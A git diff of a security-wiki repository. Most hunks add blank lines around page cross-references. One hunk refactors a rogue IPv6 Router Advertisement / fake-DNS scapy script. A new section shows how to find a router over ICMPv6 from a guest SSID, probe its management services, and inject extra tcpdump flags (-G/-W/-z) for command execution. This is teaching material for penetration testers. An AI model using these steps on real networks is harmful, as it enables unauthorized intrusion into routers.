b/src/binary-exploitation/libc-heap/tcache-bin-attack.md @@ -6,6 +6,7 @@ For more information about what is a Tcache bin check this page: + {{#ref}} bins-and-memory-allocations.md {{#endref}} @@ -47,4 +48,3 @@ Usually it's possible to find at the beginning of the heap a chunk containing th {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/binary-exploitation/libc-heap/unsorted-bin-attack.md b/src/binary-exploitation/libc-heap/unsorted-bin-attack.md index 07a647aa0..1bd9b4477 100644 --- a/src/binary-exploitation/libc-heap/unsorted-bin-attack.md +++ b/src/binary-exploitation/libc-heap/unsorted-bin-attack.md @@ -6,6 +6,7 @@ For more information about what is an unsorted bin check this page: + {{#ref}} bins-and-memory-allocations.md {{#endref}} @@ -73,4 +74,3 @@ Then C was deallocated, and consolidated with A+B (but B was still in used). A n {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/binary-exploitation/libc-heap/use-after-free/README.md b/src/binary-exploitation/libc-heap/use-after-free/README.md index d1e45e846..400d72280 100644 --- a/src/binary-exploitation/libc-heap/use-after-free/README.md +++ b/src/binary-exploitation/libc-heap/use-after-free/README.md @@ -13,6 +13,7 @@ The problem here is that it's not ilegal (there **won't be errors**) when a **fr A first fit attack targets the way some memory allocators, like in glibc, manage freed memory. When you free a block of memory, it gets added to a list, and new memory requests pull from that list from the end. Attackers can use this behavior to manipulate **which memory blocks get reused, potentially gaining control over them**. This can lead to "use-after-free" issues, where an attacker could **change the contents of memory that gets reallocated**, creating a security risk.\ Check more info in: + {{#ref}} first-fit.md {{#endref}} @@ -20,4 +21,3 @@ first-fit.md {{#include ../../../banners/hacktricks-training.md}} - diff --git a/src/binary-exploitation/rop-return-oriented-programing/README.md b/src/binary-exploitation/rop-return-oriented-programing/README.md index 23e170e92..e484f4887 100644 --- a/src/binary-exploitation/rop-return-oriented-programing/README.md +++ b/src/binary-exploitation/rop-return-oriented-programing/README.md @@ -152,6 +152,7 @@ In this example: Check the following page for this information: + {{#ref}} ../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md {{#endref}} @@ -168,18 +169,21 @@ Notice that ROP is just a technique in order to execute arbitrary code. Based in - **Ret2lib**: Use ROP to call arbitrary functions from a loaded library with arbitrary parameters (usually something like `system('/bin/sh')`. + {{#ref}} ret2lib/ {{#endref}} - **Ret2Syscall**: Use ROP to prepare a call to a syscall, e.g. `execve`, and make it execute arbitrary commands. + {{#ref}} rop-syscall-execv/ {{#endref}} - **EBP2Ret & EBP Chaining**: The first will abuse EBP instead of EIP to control the flow and the second is similar to Ret2lib but in this case the flow is controlled mainly with EBP addresses (although t's also needed to control EIP). + {{#ref}} ../stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md {{#endref}} @@ -195,4 +199,3 @@ rop-syscall-execv/ {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/binary-exploitation/rop-return-oriented-programing/ret2csu.md b/src/binary-exploitation/rop-return-oriented-programing/ret2csu.md index d588683c0..56771fb14 100644 --- a/src/binary-exploitation/rop-return-oriented-programing/ret2csu.md +++ b/src/binary-exploitation/rop-return-oriented-programing/ret2csu.md @@ -79,6 +79,7 @@ Another way to control **`rdi`** and **`rsi`** from the ret2csu gadget is by acc Check this page for more info: + {{#ref}} brop-blind-return-oriented-programming.md {{#endref}} @@ -184,4 +185,3 @@ Usually these cases are also vulnerable to [**ret2plt**](../common-binary-protec {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/binary-exploitation/rop-return-oriented-programing/ret2dlresolve.md b/src/binary-exploitation/rop-return-oriented-programing/ret2dlresolve.md index 7a533a75b..a8e80f3f7 100644 --- a/src/binary-exploitation/rop-return-oriented-programing/ret2dlresolve.md +++ b/src/binary-exploitation/rop-return-oriented-programing/ret2dlresolve.md @@ -17,6 +17,7 @@ Usually, all these structures are faked by making an **initial ROP chain that ca Chek this video for a nice explanation about this technique in the second half of the video: + {{#ref}} https://youtu.be/ADULSwnQs-s?feature=shared {{#endref}} @@ -197,4 +198,3 @@ target.interactive() - 32bit, no relro, no canary, nx, no pie, basic small buffer overflow and return. To exploit it the bof is used to call `read` again with a `.bss` section and a bigger size, to store in there the `dlresolve` fake tables to load `system`, return to main and re-abuse the initial bof to call dlresolve and then `system('/bin/sh')`. {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/binary-exploitation/rop-return-oriented-programing/ret2lib/README.md b/src/binary-exploitation/rop-return-oriented-programing/ret2lib/README.md index 94281bf4c..52a250b0c 100644 --- a/src/binary-exploitation/rop-return-oriented-programing/ret2lib/README.md +++ b/src/binary-exploitation/rop-return-oriented-programing/ret2lib/README.md @@ -61,12 +61,14 @@ In this case it is loaded in **0xb75dc000** (This will be the base address of li It might be possible that you **don't know the libc the binary is loading** (because it might be located in a server where you don't have any access). In that case you could abuse the vulnerability to **leak some addresses and find which libc** library is being used: + {{#ref}} rop-leaking-libc-address/ {{#endref}} And you can find a pwntools template for this in: + {{#ref}} rop-leaking-libc-address/rop-leaking-libc-template.md {{#endref}} @@ -91,6 +93,7 @@ for off in range(0xb7000000, 0xb8000000, 0x1000): Execute a shell just jumping to **one** specific **address** in libc: + {{#ref}} one-gadget.md {{#endref}} @@ -119,6 +122,7 @@ for off in range(0xb7000000, 0xb8000000, 0x1000): Check the example from: + {{#ref}} ../ {{#endref}} @@ -131,6 +135,7 @@ Also in ARM64 an instruction does what the instruction does (it's not possible t Check the example from: + {{#ref}} ret2lib-+-printf-leak-arm64.md {{#endref}} @@ -143,6 +148,7 @@ This allows to **leak information from the process** by calling `printf`/`puts` This basically means abusing a **Ret2lib to transform it into a `printf` format strings vulnerability** by using the `ret2lib` to call printf with the values to exploit it (sounds useless but possible): + {{#ref}} ../../format-strings/ {{#endref}} @@ -165,4 +171,3 @@ This basically means abusing a **Ret2lib to transform it into a `printf` format {{#include ../../../banners/hacktricks-training.md}} - diff --git a/src/binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/README.md b/src/binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/README.md index 62158da13..0f071f85d 100644 --- a/src/binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/README.md +++ b/src/binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/README.md @@ -38,6 +38,7 @@ gcc -o vuln vuln.c -fno-stack-protector -no-pie Download the exploit and place it in the same directory as the vulnerable binary and give the needed data to the script: + {{#ref}} rop-leaking-libc-template.md {{#endref}} @@ -265,6 +266,7 @@ rop2 = base + p64(ONE_GADGET) + "\x00"*100 You can find a template to exploit this vulnerability here: + {{#ref}} rop-leaking-libc-template.md {{#endref}} @@ -304,4 +306,3 @@ BINSH = next(libc.search("/bin/sh")) - 64 {{#include ../../../../banners/hacktricks-training.md}} - diff --git a/src/binary-exploitation/rop-return-oriented-programing/ret2vdso.md b/src/binary-exploitation/rop-return-oriented-programing/ret2vdso.md index 7cf6ba6d0..4cfc40a55 100644 --- a/src/binary-exploitation/rop-return-oriented-programing/ret2vdso.md +++ b/src/binary-exploitation/rop-return-oriented-programing/ret2vdso.md @@ -62,6 +62,7 @@ pop_ebx_pop_esi_pop_ebp_ret = vdso_addr + 0x15cd After dumping and checking the vdso section of a binary in kali 2023.2 arm64, I couldn't find in there any interesting gadget (no way to control registers from values in the stack or to control x30 for a ret) **except a way to call a SROP**. Check more info int eh example from the page: + {{#ref}} srop-sigreturn-oriented-programming/srop-arm64.md {{#endref}} @@ -69,4 +70,3 @@ srop-sigreturn-oriented-programming/srop-arm64.md {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/README.md b/src/binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/README.md index 6bdc7083c..4c30698b2 100644 --- a/src/binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/README.md +++ b/src/binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/README.md @@ -110,6 +110,7 @@ rop += writeGadget #Address to: mov qword ptr [rax], rdx If you are **lacking gadgets**, for example to write `/bin/sh` in memory, you can use the **SROP technique to control all the register values** (including RIP and params registers) from the stack: + {{#ref}} ../srop-sigreturn-oriented-programming/ {{#endref}} @@ -195,4 +196,3 @@ target.interactive() {{#include ../../../banners/hacktricks-training.md}} - diff --git a/src/binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/ret2syscall-arm64.md b/src/binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/ret2syscall-arm64.md index d0ce408f6..90716bbe4 100644 --- a/src/binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/ret2syscall-arm64.md +++ b/src/binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/ret2syscall-arm64.md @@ -4,6 +4,7 @@ Find an introduction to arm64 in: + {{#ref}} ../../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md {{#endref}} @@ -12,6 +13,7 @@ Find an introduction to arm64 in: We are going to use the example from the page: + {{#ref}} ../../stack-overflow/ret2win/ret2win-arm64.md {{#endref}} @@ -128,4 +130,3 @@ p.interactive() {{#include ../../../banners/hacktricks-training.md}} - diff --git a/src/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/README.md b/src/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/README.md index 047a9d7be..efd7eb2e5 100644 --- a/src/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/README.md +++ b/src/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/README.md @@ -15,6 +15,7 @@ The interesting part is how **`sigreturn`** restores the program's state: it doe Note how this would be a **type of Ret2syscall** that makes much easier to control params to call other Ret2syscalls: + {{#ref}} ../rop-syscall-execv/ {{#endref}} @@ -59,6 +60,7 @@ If you are curious this is the **sigcontext structure** stored in the stack to l For a better explanation check also: + {{#ref}} https://youtu.be/ADULSwnQs-s?feature=shared {{#endref}} @@ -145,4 +147,3 @@ target.interactive() - SROP is used to give execution privileges (memprotect) to the place where a shellcode was placed. {{#include ../../../banners/hacktricks-training.md}} - diff --git a/src/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/srop-arm64.md b/src/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/srop-arm64.md index 3b71ab827..45382d85c 100644 --- a/src/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/srop-arm64.md +++ b/src/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/srop-arm64.md @@ -179,12 +179,14 @@ p.interactive() For more info about vdso check: + {{#ref}} ../ret2vdso.md {{#endref}} And to bypass the address of `/bin/sh` you could create several env variables pointing to it, for more info: + {{#ref}} ../../common-binary-protections-and-bypasses/aslr/ {{#endref}} diff --git a/src/binary-exploitation/stack-overflow/README.md b/src/binary-exploitation/stack-overflow/README.md index 90764e763..c45d2c3d1 100644 --- a/src/binary-exploitation/stack-overflow/README.md +++ b/src/binary-exploitation/stack-overflow/README.md @@ -65,6 +65,7 @@ However, in other scenarios maybe just **overwriting some variables values in th In this type of CTF challenges, there is a **function** **inside** the binary that is **never called** and that **you need to call in order to win**. For these challenges you just need to find the **offset to overwrite the return address** and **find the address of the function** to call (usually [**ASLR**](../common-binary-protections-and-bypasses/aslr/index.html) would be disabled) so when the vulnerable function returns, the hidden function will be called: + {{#ref}} ret2win/ {{#endref}} @@ -73,6 +74,7 @@ ret2win/ In this scenario the attacker could place a shellcode in the stack and abuse the controlled EIP/RIP to jump to the shellcode and execute arbitrary code: + {{#ref}} stack-shellcode/ {{#endref}} @@ -81,6 +83,7 @@ stack-shellcode/ This technique is the fundamental framework to bypass the main protection to the previous technique: **No executable stack (NX)**. And it allows to perform several other techniques (ret2lib, ret2syscall...) that will end executing arbitrary commands by abusing existing instructions in the binary: + {{#ref}} ../rop-return-oriented-programing/ {{#endref}} @@ -89,6 +92,7 @@ This technique is the fundamental framework to bypass the main protection to the An overflow is not always going to be in the stack, it could also be in the **heap** for example: + {{#ref}} ../libc-heap/heap-overflow.md {{#endref}} @@ -97,6 +101,7 @@ An overflow is not always going to be in the stack, it could also be in the **he There are several protections trying to prevent the exploitation of vulnerabilities, check them in: + {{#ref}} ../common-binary-protections-and-bypasses/ {{#endref}} @@ -201,4 +206,3 @@ Lessons learned: {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/binary-exploitation/stack-overflow/ret2win/README.md b/src/binary-exploitation/stack-overflow/ret2win/README.md index e4c1650c6..a0e8464a3 100644 --- a/src/binary-exploitation/stack-overflow/ret2win/README.md +++ b/src/binary-exploitation/stack-overflow/ret2win/README.md @@ -108,6 +108,7 @@ The Python script sends a carefully crafted message that, when processed by the ## ARM64 Example + {{#ref}} ret2win-arm64.md {{#endref}} @@ -115,4 +116,3 @@ ret2win-arm64.md {{#include ../../../banners/hacktricks-training.md}} - diff --git a/src/binary-exploitation/stack-overflow/ret2win/ret2win-arm64.md b/src/binary-exploitation/stack-overflow/ret2win/ret2win-arm64.md index 8fac862fa..e9f4259d0 100644 --- a/src/binary-exploitation/stack-overflow/ret2win/ret2win-arm64.md +++ b/src/binary-exploitation/stack-overflow/ret2win/ret2win-arm64.md @@ -4,6 +4,7 @@ Find an introduction to arm64 in: + {{#ref}} ../../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md {{#endref}} @@ -189,4 +190,3 @@ p.close() {{#include ../../../banners/hacktricks-training.md}} - diff --git a/src/binary-exploitation/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md b/src/binary-exploitation/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md index 05ba2babe..dafc5af1c 100644 --- a/src/binary-exploitation/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md +++ b/src/binary-exploitation/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md @@ -196,6 +196,7 @@ xchg , rsp Check the ret2esp technique here: + {{#ref}} ../rop-return-oriented-programing/ret2esp-ret2reg.md {{#endref}} @@ -234,6 +235,7 @@ Modern x86 CPUs and OSes increasingly deploy **CET Shadow Stack (SHSTK)**. With - For background and deeper details see: + {{#ref}} ../common-binary-protections-and-bypasses/cet-and-shadow-stack.md {{#endref}} @@ -287,6 +289,7 @@ Therefore, by default, just abusing the epilogue you **won't be able to control Also in the following page you can see the equivalent of **Ret2esp in ARM64**: + {{#ref}} ../rop-return-oriented-programing/ret2esp-ret2reg.md {{#endref}} diff --git a/src/binary-exploitation/stack-overflow/stack-shellcode/stack-shellcode-arm64.md b/src/binary-exploitation/stack-overflow/stack-shellcode/stack-shellcode-arm64.md index 68cf6dc54..1a6ac5fce 100644 --- a/src/binary-exploitation/stack-overflow/stack-shellcode/stack-shellcode-arm64.md +++ b/src/binary-exploitation/stack-overflow/stack-shellcode/stack-shellcode-arm64.md @@ -4,6 +4,7 @@ Find an introduction to arm64 in: + {{#ref}} ../../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md {{#endref}} @@ -81,4 +82,3 @@ I opened the generated **`core` file** (`gdb ./bog ./core`) and checked the real {{#include ../../../banners/hacktricks-training.md}} - diff --git a/src/crypto-and-stego/esoteric-languages.md b/src/crypto-and-stego/esoteric-languages.md index f7935190c..e99d88692 100644 --- a/src/crypto-and-stego/esoteric-languages.md +++ b/src/crypto-and-stego/esoteric-languages.md @@ -52,6 +52,7 @@ Take it to the top Whisper my world ``` + {{#ref}} https://codewithrockstar.com/ {{#endref}} @@ -69,4 +70,3 @@ Kukarek ``` {{#include ../banners/hacktricks-training.md}} - diff --git a/src/crypto-and-stego/hash-length-extension-attack.md b/src/crypto-and-stego/hash-length-extension-attack.md index 6bbfc103c..13f312fd3 100644 --- a/src/crypto-and-stego/hash-length-extension-attack.md +++ b/src/crypto-and-stego/hash-length-extension-attack.md @@ -29,6 +29,7 @@ If an attacker wants to append the string "append" he can: ### **Tool** + {{#ref}} https://github.com/iagox86/hash_extender {{#endref}} @@ -38,4 +39,3 @@ https://github.com/iagox86/hash_extender You can find this attack good explained in [https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks) {{#include ../banners/hacktricks-training.md}} - diff --git a/src/crypto-and-stego/rc4-encrypt-and-decrypt.md b/src/crypto-and-stego/rc4-encrypt-and-decrypt.md index 03f094366..b2ad63f78 100644 --- a/src/crypto-and-stego/rc4-encrypt-and-decrypt.md +++ b/src/crypto-and-stego/rc4-encrypt-and-decrypt.md @@ -6,13 +6,14 @@ If you can somehow encrypt a plaintext using RC4, you can decrypt any content en If you can encrypt a known plaintext you can also extract the password. More references can be found in the HTB Kryptos machine: + {{#ref}} https://0xrick.github.io/hack-the-box/kryptos/ {{#endref}} + {{#ref}} https://0xrick.github.io/hack-the-box/kryptos/ {{#endref}} {{#include ../banners/hacktricks-training.md}} - diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/README.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/README.md index a3b9436dd..6be5533c5 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/README.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/README.md @@ -4,6 +4,7 @@ ## Creating and Mounting an Image + {{#ref}} ../../generic-methodologies-and-resources/basic-forensic-methodology/image-acquisition-and-mount.md {{#endref}} @@ -12,6 +13,7 @@ This **isn't necessary the first step to perform once you have the image**. But you can use this malware analysis techniques independently if you have a file, a file-system image, memory image, pcap... so it's good to **keep these actions in mind**: + {{#ref}} malware-analysis.md {{#endref}} @@ -20,20 +22,24 @@ malware-analysis.md if you are given a **forensic image** of a device you can start **analyzing the partitions, file-system** used and **recovering** potentially **interesting files** (even deleted ones). Learn how in: + {{#ref}} partitions-file-systems-carving/ {{#endref}} Depending on the used OSs and even platform different interesting artifacts should be searched: + {{#ref}} windows-forensics/ {{#endref}} + {{#ref}} linux-forensics.md {{#endref}} + {{#ref}} docker-forensics.md {{#endref}} @@ -43,24 +49,28 @@ docker-forensics.md If you have very **suspicious** **file**, then **depending on the file-type and software** that created it several **tricks** may be useful.\ Read the following page to learn some interesting tricks: + {{#ref}} specific-software-file-type-tricks/ {{#endref}} I want to do a special mention to the page: + {{#ref}} specific-software-file-type-tricks/browser-artifacts.md {{#endref}} ## Memory Dump Inspection + {{#ref}} memory-dump-analysis/ {{#endref}} ## Pcap Inspection + {{#ref}} pcap-inspection/ {{#endref}} @@ -69,12 +79,14 @@ pcap-inspection/ Keep in mind the possible use of anti-forensic techniques: + {{#ref}} anti-forensic-techniques.md {{#endref}} ## Threat Hunting + {{#ref}} file-integrity-monitoring.md {{#endref}} @@ -82,4 +94,3 @@ file-integrity-monitoring.md {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/linux-forensics.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/linux-forensics.md index f2d4316c2..659513ff9 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/linux-forensics.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/linux-forensics.md @@ -155,6 +155,7 @@ Linux offers tools for ensuring the integrity of system components, crucial for Read the following page to learn about tools that can be useful to find malware: + {{#ref}} malware-analysis.md {{#endref}} @@ -399,4 +400,3 @@ git diff --no-index --diff-filter=D path/to/old_version/ path/to/new_version/ - diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/README.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/README.md index e198cea12..baf064c2f 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/README.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/README.md @@ -195,6 +195,7 @@ As was seen before there are several places where the file is still saved after Also, the OS usually saves a lot of information about file system changes and backups, so it's possible to try to use them to recover the file or as much information as possible. + {{#ref}} file-data-carving-recovery-tools.md {{#endref}} @@ -207,6 +208,7 @@ Note that this technique **doesn't work to retrieve fragmented files**. If a fil There are several tools that you can use for file Carving indicating the file types you want to search for + {{#ref}} file-data-carving-recovery-tools.md {{#endref}} @@ -216,6 +218,7 @@ file-data-carving-recovery-tools.md Data Stream Carving is similar to File Carving but **instead of looking for complete files, it looks for interesting fragments** of information.\ For example, instead of looking for a complete file containing logged URLs, this technique will search for URLs. + {{#ref}} file-data-carving-recovery-tools.md {{#endref}} @@ -235,4 +238,3 @@ You may notice that even performing that action there might be **other parts whe {{#include ../../../banners/hacktricks-training.md}} - diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/README.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/README.md index e13f9411a..903715256 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/README.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/README.md @@ -23,6 +23,7 @@ The following tools are useful to extract statistics, files, etc. You can find some Wireshark tricks in: + {{#ref}} wireshark-tricks.md {{#endref}} @@ -92,6 +93,7 @@ ngrep -I packets.pcap "^GET" "port 80 and tcp and host 192.168 and dst host 192. Using common carving techniques can be useful to extract files and information from the pcap: + {{#ref}} ../partitions-file-systems-carving/file-data-carving-recovery-tools.md {{#endref}} @@ -133,6 +135,7 @@ suricata -r packets.pcap -c /etc/suricata/suricata.yaml -k none -v -l log Check if you can find any fingerprint of a known malware: + {{#ref}} ../malware-analysis.md {{#endref}} @@ -216,14 +219,17 @@ rita show-exploded-dns -H --limit 10 zeek_logs ## Other pcap analysis tricks + {{#ref}} dnscat-exfiltration.md {{#endref}} + {{#ref}} wifi-pcap-analysis.md {{#endref}} + {{#ref}} usb-keystrokes.md {{#endref}} @@ -233,4 +239,3 @@ usb-keystrokes.md {{#include ../../../banners/hacktricks-training.md}} - diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/README.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/README.md index e5e497ee7..8d0ad913d 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/README.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/README.md @@ -4,38 +4,47 @@ Here you can find interesting tricks for specific file-types and/or software: + {{#ref}} .pyc.md {{#endref}} + {{#ref}} browser-artifacts.md {{#endref}} + {{#ref}} desofuscation-vbs-cscript.exe.md {{#endref}} + {{#ref}} local-cloud-storage.md {{#endref}} + {{#ref}} office-file-analysis.md {{#endref}} + {{#ref}} pdf-file-analysis.md {{#endref}} + {{#ref}} png-tricks.md {{#endref}} + {{#ref}} video-and-audio-file-analysis.md {{#endref}} + {{#ref}} zips-tricks.md {{#endref}} @@ -43,4 +52,3 @@ zips-tricks.md {{#include ../../../banners/hacktricks-training.md}} - diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/README.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/README.md index e7401a358..616ef4e6f 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/README.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/README.md @@ -266,6 +266,7 @@ In `SAM\Domains\Account\Users` you can obtain the username, the RID, last login, ### Interesting entries in the Windows Registry + {{#ref}} interesting-windows-registry-keys.md {{#endref}} @@ -502,4 +503,3 @@ Security EventID 1102 signals the deletion of logs, a critical event for forensi {{#include ../../../banners/hacktricks-training.md}} - diff --git a/src/generic-methodologies-and-resources/external-recon-methodology/README.md b/src/generic-methodologies-and-resources/external-recon-methodology/README.md index a98bef336..33636f576 100644 --- a/src/generic-methodologies-and-resources/external-recon-methodology/README.md +++ b/src/generic-methodologies-and-resources/external-recon-methodology/README.md @@ -479,10 +479,12 @@ echo www | subzuf facebook.com Check this blog post I wrote about how to **automate the subdomain discovery** from a domain using **Trickest workflows** so I don't need to launch manually a bunch of tools in my computer: + {{#ref}} https://trickest.com/blog/full-subdomain-discovery-using-workflow/ {{#endref}} + {{#ref}} https://trickest.com/blog/full-subdomain-brute-force-discovery-using-workflow/ {{#endref}} @@ -641,6 +643,7 @@ You can use the **tool** [**Leakos**](https://github.com/carlospolop/Leakos) to Check also this **page** for potential **github dorks** you could also search for in the organization you are attacking: + {{#ref}} github-leaked-secrets.md {{#endref}} @@ -666,6 +669,7 @@ If you found that the company has **open-source code** you can **analyse** it an **Depending on the language** there are different **tools** you can use: + {{#ref}} ../../network-services-pentesting/pentesting-web/code-review-tools.md {{#endref}} @@ -710,4 +714,3 @@ There are several tools out there that will perform part of the proposed actions - All free courses of [**@Jhaddix**](https://twitter.com/Jhaddix) like [**The Bug Hunter's Methodology v4.0 - Recon Edition**](https://www.youtube.com/watch?v=p4JgIu1mceI) {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/generic-methodologies-and-resources/pentesting-network/README.md b/src/generic-methodologies-and-resources/pentesting-network/README.md index 94c4fea52..735e637e2 100644 --- a/src/generic-methodologies-and-resources/pentesting-network/README.md +++ b/src/generic-methodologies-and-resources/pentesting-network/README.md @@ -64,6 +64,7 @@ nmap -T4 -sY -n --open -Pn Here you can find a nice guide of all the well known Wifi attacks at the time of the writing: + {{#ref}} ../pentesting-wifi/ {{#endref}} @@ -192,12 +193,14 @@ nmap -T4 -p- -sY -sV -sC -F -n -oA SCTAllScan ### IDS and IPS evasion + {{#ref}} ids-evasion.md {{#endref}} ### **More nmap options** + {{#ref}} nmap-summary-esp.md {{#endref}} @@ -388,6 +391,7 @@ sendp(packet) If you have **access to a switch that you are directly connected to**, you have the ability to **bypass VLAN segmentation** within the network. Simply **switch the port to trunk mode** (otherwise known as trunk), create virtual interfaces with the IDs of the target VLANs, and configure an IP address. You can try requesting the address dynamically (DHCP) or you can configure it statically. It depends on the case. + {{#ref}} lateral-vlan-segmentation-bypass.md {{#endref}} @@ -611,6 +615,7 @@ eapmd5pass –r pcap.dump –w /usr/share/wordlist/sqlmap.txt **Cisco Systems engineers have developed two FHRP protocols, GLBP and HSRP.** + {{#ref}} glbp-and-hsrp-attacks.md {{#endref}} @@ -632,6 +637,7 @@ To attack a EIGRP system requires **establishing a neighbourhood with a legitima [**FRRouting**](https://frrouting.org/) allows you to implement **a virtual router that supports BGP, OSPF, EIGRP, RIP and other protocols.** All you need to do is deploy it on your attacker’s system and you can actually pretend to be a legitimate router in the routing domain. + {{#ref}} eigrp-attacks.md {{#endref}} @@ -893,6 +899,7 @@ Bettercap broadcast WSD packets searching for services (UDP Port 3702). ### Telecom / Mobile-Core (GTP) Exploitation + {{#ref}} telecom-network-exploitation.md {{#endref}} @@ -909,4 +916,3 @@ telecom-network-exploitation.md {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/generic-methodologies-and-resources/pentesting-network/pentesting-ipv6.md b/src/generic-methodologies-and-resources/pentesting-network/pentesting-ipv6.md index 878c600e5..d66104014 100644 --- a/src/generic-methodologies-and-resources/pentesting-network/pentesting-ipv6.md +++ b/src/generic-methodologies-and-resources/pentesting-network/pentesting-ipv6.md @@ -280,11 +280,12 @@ from scapy.all import * import argparse p = argparse.ArgumentParser() -p.add_argument('-i','--interface',required=True) -p.add_argument('--llip',required=True) -p.add_argument('--dns',required=True,help='Fake DNS IPv6') -p.add_argument('--lifetime',type=int,default=600) -p.add_argument('--interval',type=int,default=5) +P = p.add_argument +P('-i','--interface',required=True) +P('--llip',required=True) +P('--dns',required=True,help='Fake DNS IPv6') +P('--lifetime',type=int,default=600) +P('--interval',type=int,default=5) args = p.parse_args() ra = (IPv6(src=args.llip,dst='ff02::1',hlim=255)/ @@ -317,6 +318,58 @@ sudo mitm6 -i eth0 --no-ra # only DHCPv6 poisoning * Disabling IPv6 on endpoints is a temporary workaround that often breaks modern services and hides blind spots – prefer L2 filtering instead. +### NDP Router Discovery on Guest/Public SSIDs and Management Service Exposure + +Many consumer routers expose management daemons (HTTP(S), SSH/Telnet, TR-069, etc.) on all interfaces. In some deployments, the “guest/public” SSID is bridged to the WAN/core and is IPv6-only. Even if the router’s IPv6 changes on every boot, you can reliably learn it using NDP/ICMPv6 and then direct-connect to the management plane from the guest SSID. + +Typical workflow from a client connected to the guest/public SSID: + +1) Discover the router via ICMPv6 Router Solicitation to the All-Routers multicast `ff02::2` and capture the Router Advertisement (RA): + +```bash +# Listen for Router Advertisements (ICMPv6 type 134) +sudo tcpdump -vvv -i 'icmp6 and ip6[40]==134' + +# Provoke an RA by sending a Router Solicitation to ff02::2 +python3 - <<'PY' +from scapy.all import * +send(IPv6(dst='ff02::2')/ICMPv6ND_RS(), iface='') +PY +``` + +The RA reveals the router’s link-local and often a global address/prefix. If only a link-local is known, remember that connections must specify the zone index, e.g. `ssh -6 admin@[fe80::1%wlan0]`. + +Alternative: use ndisc6 suite if available: + +```bash +# rdisc6 sends RS and prints RAs in a friendly way +rdisc6 +``` + +2) Reach exposed services over IPv6 from the guest SSID: + +```bash +# SSH/Telnet example (replace with discovered address) +ssh -6 admin@[2001:db8:abcd::1] +# Web UI over IPv6 +curl -g -6 -k 'http://[2001:db8:abcd::1]/' +# Fast IPv6 service sweep +nmap -6 -sS -Pn -p 22,23,80,443,7547 [2001:db8:abcd::1] +``` + +3) If the management shell provides packet-capture tooling via a wrapper (e.g., tcpdump), check for argument/filename injection that allows passing extra tcpdump flags like `-G/-W/-z` to achieve post-rotate command execution. See: + + +{{#ref}} +../../linux-hardening/privilege-escalation/wildcards-spare-tricks.md +{{#endref}} + +Defences/notes: + +- 